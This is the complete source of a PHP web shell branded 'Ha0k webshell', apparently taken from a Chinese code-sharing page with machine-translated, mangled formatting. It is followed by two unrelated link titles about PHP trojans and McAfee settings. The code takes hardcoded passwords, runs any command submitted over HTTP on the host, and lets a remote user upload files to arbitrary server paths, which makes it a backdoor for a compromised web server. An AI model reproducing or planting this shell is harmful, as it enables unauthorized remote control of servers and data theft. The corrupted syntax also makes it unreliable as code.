Copy codeThe Code is as follows:
<? Php
// Multiple users can be set here
$ Passwd = array ('ha0k' => 'ha0k ',
'Hackerdsb' => 'hackerdsb ');
/* Set the command alias here */
$ Aliases = array ('LS' => 'ipconfig ',
'Ll '=> 'LS-lvhF ');
If (! Isset ($ _ SERVER ['php _ AUTH_USER ']) |! Isset ($ _ SERVER ['php _ AUTH_PW ']) |
! Isset ($ passwd [$ _ SERVER ['php _ AUTH_USER ']) |
$ Passwd [$ _ SERVER ['php _ AUTH_USER ']! = $ _ SERVER ['php _ AUTH_PW ']) {
Header ('www-Authenticate: Basic realm = "by Ha0k "');
Header ('HTTP/1.0 401 unauthorized ');
$ Authenticated = false;
}
Else {
$ Authenticated = true;
/* Start session */
Session_start ();
/* Initialize session .*/
If (empty ($ _ SESSION ['cwd ']) |! Empty ($ _ REQUEST ['reset']) {
$ _ SESSION ['cwd '] = getcwd (); // obtain the current directory
$ _ SESSION ['History '] = array ();
$ _ SESSION ['output'] = '';
}
If (! Empty ($ _ REQUEST ['command']) {
If (get_magic_quotes_gpc () {// Table 0 is disabled, table 1 is enabled, and filtering is enabled
/* We don't want to add the commands to the history in
* Escaped form, so we remove the backslashes now .*/
$ _ REQUEST ['command'] = stripslashes ($ _ REQUEST ['command']); // returns the original string processed by the addslashes () function.
}
/* History */
If ($ I = array_search ($ _ REQUEST ['command'], $ _ SESSION ['History '])! = False) // find the value in the saved Array
Unset ($ _ SESSION ['History '] [$ I]); // destroy
Array_unshift ($ _ SESSION ['History '], $ _ REQUEST ['command']); // The array_unshift () function inserts new elements into an array. The new array is added to the beginning of the original array. The function returns an array after the new element is inserted.
/* Output Ha0k # command */
$ _ SESSION ['output']. = 'ha0k # '. $ _ REQUEST ['command']. "\ n ";
/* Initialize the current working directory .*/
If (ereg ('^ [: blank:] * cd [[: blank:] * $', $ _ REQUEST ['command']) {
$ _ SESSION ['cwd '] = dirname (_ FILE _); // obtain the current directory
} Elseif (ereg ('^ [: blank:] * cd [[: blank:] + ([^;] +) $ ', $ _ REQUEST ['command'], $ regs )){
/* The current command is a 'cd' command which we have to handle
* As an internal shell command .*/
If ($ regs [1] [0] = '/'){
/* Absolute path, we use it unchanged .*/
$ New_dir = $ regs [1];
} Else {
/* Relative path, we append it to the current working
* Directory .*/
$ New_dir = $ _ SESSION ['cwd '].'/'. $ regs [1];
}
/* Transform '/./'into '/'*/
While (strpos ($ new_dir ,'/./')! = False)
$ New_dir = str_replace ('/./', '/', $ new_dir );
/* Transform '// 'input '/'*/
While (strpos ($ new_dir ,'//')! = False)
$ New_dir = str_replace ('//', '/', $ new_dir );
/* Transform 'x/... 'into ''*/
While (preg_match ('| /\.\.(?! \.) | ', $ New_dir ))
$ New_dir = preg_replace ('| /? [^/] + /\.\.(?! \.) | ', '', $ New_dir );
If ($ new_dir = '') $ new_dir = '/';
/* Try to change directory .*/
If (@ chdir ($ new_dir) {// change the current directory
$ _ SESSION ['cwd '] = $ new_dir;
} Else {
$ _ SESSION ['output']. = "cd: cocould not change to: $ new_dir \ n ";
}
} Else {
/* The command is not a 'cd' command, so we execute it after
* Changing the directory and save the output .*/
Chdir ($ _ SESSION ['cwd ']); // change the Directory
/* Alias extension */
$ Length = strcspn ($ _ REQUEST ['command'], "\ t"); // find the \ t string and return the position
$ Token = substr ($ _ REQUEST ['command'], 0, $ length); // obtain the string 0-\ t
If (isset ($ aliases [$ token])
$ _ REQUEST ['command'] = $ aliases [$ token]. substr ($ _ REQUEST ['command'], $ length );
$ P = proc_open ($ _ REQUEST ['command'], // execute the script
Array (1 => array ('pipe', 'w '),
2 => array ('pipe', 'w ')),
$ Io );
/* Read and send */
While (! Feof ($ io [1]) {
$ _ SESSION ['output']. = htmlspecialchars (fgets ($ io [1]), // convert special characters to HTML character encoding
ENT_COMPAT, 'gb2312 ');
}
/* Read */
While (! Feof ($ io [2]) {
$ _ SESSION ['output']. = htmlspecialchars (fgets ($ io [2]),
ENT_COMPAT, 'gb2312 ');
}
Fclose ($ io [1]);
Fclose ($ io [2]);
Proc_close ($ p); // close the MPs queue
}
}
/* Build command history in JavaScript */
If (empty ($ _ SESSION ['History ']) {
$ Js_command_hist = '""';
} Else {
$ Escaped = array_map ('addslashes ', $ _ SESSION ['History']);
$ Js_command_hist = '"", "'. implode ('", "', $ escaped). '"'; // string the array.
}
}
Header ('content-Type: text/html; charset = GB2312 ');
Echo '<? Xml version = "1.0" encoding = "GB2312"?> '. "\ N ";
?>
<? Php
If (is_uploaded_file ($ HTTP_POST_FILES ['userfile'] ['tmp _ name']) {
Copy ($ HTTP_POST_FILES ['userfile'] ['tmp _ name'], $ _ POST ['remotefile']);
// Echo "File Uploaded successfully:". $ HTTP_POST_FILES ['userfile'] ['name'];
}
?>
<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Strict // EN"
Http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd>
<Html xmlns = "http://www.w3.org/1999/xhtml" xml: lang = "en" lang = "en">
<Head>
<Title> Ha0k webshell </title>
<Script type = "text/javascript" language = "JavaScript">
Var current_line = 0;
Var command_hist = new Array (<? Php echo $ js_command_hist?> );
Var last = 0;
Function key (e ){
If (! E) var e = window. event;
If (e. keyCode = 38 & current_line <command_hist.length-1 ){
Command_hist [current_line] = document. shell. command. value;
Current_line ++;
Document. shell. command. value = command_hist [current_line];
}
If (e. keyCode = 40 & current_line> 0 ){
Command_hist [current_line] = document. shell. command. value;
Current_line --;
Document. shell. command. value = command_hist [current_line];
}
}
Function init (){
Document. shell. setAttribute ("autocomplete", "off ");
Document. shell. output. scrollTop = document. shell. output. scrollHeight;
Document. shell. command. focus ();
}
</Script>
<Style type = "text/css">
<! --
. STYLE1 {
Color: #33FF33;
Font-weight: bold;
}
A: link {
Text-decoration: none;
}
A: visited {
Text-decoration: none;
}
A: hover {
Text-decoration: none;
}
A: active {
Text-decoration: none;
}
-->
</Style>
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312"/> <Body onload = "init ()">
<Body bgcolor = "#$ $">
<Body text = "1afa3a">
<H1> <a href = "http://hi.baidu.com/hackerdsb" class = "STYLE1"> HA0K </a> <H6> we just for justice, fight for evial <? Php if (! $ Authenticated) {?>
<P> You failed to authenticate yourself to PhpShell. You can <
Href = "<? Php echo $ _ SERVER ['php _ SELF ']?> "> Reload </a> to try again. </p>
<P> Try reading the <a href = "INSTALL"> INSTALL </a> file if you're having
Problems with installing PhpShell. </p>
</Body>
</Html>
<? Php //
Exit;
}
Error_reporting (E_ALL );
If (empty ($ _ REQUEST ['rows ']) $ _ REQUEST ['rows'] = 10;
?>
<P> the current directory is: <code> <? Php echo $ _ SESSION ['cwd ']?> </Code> </p>
<Form name = "shell" action = "<? Php echo $ _ SERVER ['php _ SELF ']?> "Method =" post ">
<Div>
<Textarea name = "output" readonly = "readonly" cols = "80" rows = "<? Php echo $ _ REQUEST ['rows ']?> ">
<? Php
$ Lines = substr_count ($ _ SESSION ['output'], "\ n ");
$ Padding = str_repeat ("\ n", max (0, $ _ REQUEST ['rows '] + 1-$ lines ));
Echo rtrim ($ padding. $ _ SESSION ['output']);
?>
</Textarea>
</Div> <br>
<P class = "prompt">
$ <Input class = "prompt" name = "command" type = "text"
Onkeyup = "key (event)" size = "78" tabindex = "1">
</P>
<P>
<Input type = "submit" value = "execution"/>
<Input type = "submit" name = "reset" value = "Restore"/>
Number of rows: <input type = "text" name = "rows" value = "<? Php echo $ _ REQUEST ['rows ']?> "/>
</P>
</Form>
<Form enctype = "multipart/form-data" action = "" method = "post">
<Input type = "hidden" name = "MAX_FILE_SIZE" value = "1000000">
<P> local file name: <input name = "userfile" type = "file">
<P> Remote File name: <input name = "remotefile" type = "text">
<Input type = "submit" value = "send">
</Form>
</Body>
</Html>
Mcafee (coffee antivirus software) Setting tutorial for preventing webpage Trojans (do not open it on the server end at last) we strongly recommend that you Install mcafee 8.5i on the server
Prevention of a php Trojan with the smallest PHP webpage trojan in the world